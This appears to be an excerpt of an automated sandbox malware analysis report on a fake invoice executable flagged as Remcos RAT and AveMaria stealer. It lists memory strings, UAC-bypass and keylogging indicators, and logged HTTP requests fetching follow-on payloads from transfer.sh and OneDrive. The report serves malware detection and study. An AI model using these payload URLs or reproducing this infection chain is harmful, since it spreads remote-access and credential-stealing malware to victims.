Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	String found in binary or memory: https://onedrive.live.com/download?cid=B044AF3D48F7B886&resid=B044AF3D48F7B886%21122&authkey=AKVhH87
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://pki.goog/repository/0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh
Source: dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp
Source: dwn.exe, 00000011.00000000.374284805.0000000000AE2000.00000002.00000001.01000000.00000009.sdmp, dwn.exe.12.dr, Cuhcxlcg[1].exe.12.dr	String found in binary or memory: https://transfer.sh/get/3GTNpY/Rtbdyyicls.bmp%Pvdrkkndtbbqxgmhnq
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exe
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exeY
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://transfer.sh/get/J59PTO/Cuhcxlcg.exen
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/
Source: aspnet_compiler.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/
Source: bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: bhv8995.tmp.39.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.546978797.0000000003596000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.356225018.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.374159266.0000000007800000.00000004.08000000.00040000.00000000.sdmp, dwn.exe, 00000011.00000002.550439379.00000000040A1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.548404378.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.543947218.00000000030C8000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.539326956.00000000025A6000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.538968887.0000000002586000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.546933251.0000000003573000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic	HTTP traffic detected: GET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /y4mDTH7qGldoE19yex0JjOdCD7abQr3OT41x7HoVD-gSuwIqkSH1AKWWpBjmzkRc7T3d2yA9EtMAW60GsmirtvPUp6RtxG0vbsoNucdsykCwq3jc27R9OIRlOBAKG77PDK48M1AU1FOWPORMg8h_n8eC1Mlf5d263KxZye7r7rCgu9kdKTmlRfJThNYHju2p84XwXYfLp3XHRIFl1Rz8c3WRw/Xqpxc.png?download&psid=1 HTTP/1.1Host: kpf0yw.am.files.1drv.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703

Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000003.395956315.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 412214&size=306x271&https=1https://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://www.bing.com/orgid/idtoken/nosigninhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=9cec996c-66f7-47f2-b9c6-b60677edc6a8&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%22087136A1E016496C9023671FC0441E9D%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: aspnet_compiler.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: aspnet_compiler.exe, 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49706 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

14_2_0041183A

Creates a DirectInput object (often for capturing keystrokes)

Source: Shhejayly.exe, 00000012.00000002.524974268.00000000007CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR

Yara detected AveMaria stealer

Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Too many similar processes found

Source: aspnet_compiler.exe

Process created: 50

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
